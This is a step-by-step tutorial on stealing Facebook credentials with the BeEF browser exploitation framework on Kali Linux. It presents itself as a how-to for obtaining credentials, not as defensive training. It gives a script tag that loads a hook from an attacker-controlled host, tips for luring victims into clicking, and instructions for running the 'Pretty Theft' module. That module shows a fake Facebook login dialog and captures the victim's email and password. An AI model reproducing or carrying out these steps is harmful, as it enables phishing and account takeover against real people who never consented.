Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about.
step 1- Install Kali (If You Haven't Done So Already)
step 2 - Open BeEF
You can login to BeEF by using the username beef and the password beef.
You will then by greeted by BeEF's "
Getting Started" screen.
step 3 -Hook the Victim's Browser
The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as "Click here for more information" or "Click here to see the video." Use your imagination.
The script looks something like below.
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.
step 4 - Send a Dialog Box to the User
Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.
If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the "Execute" button the the bottom.
The Dialog Box Appears on the Target System
Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.
step 5 - Harvest the Credentials
Back on our system in the BeEf interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.
If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).
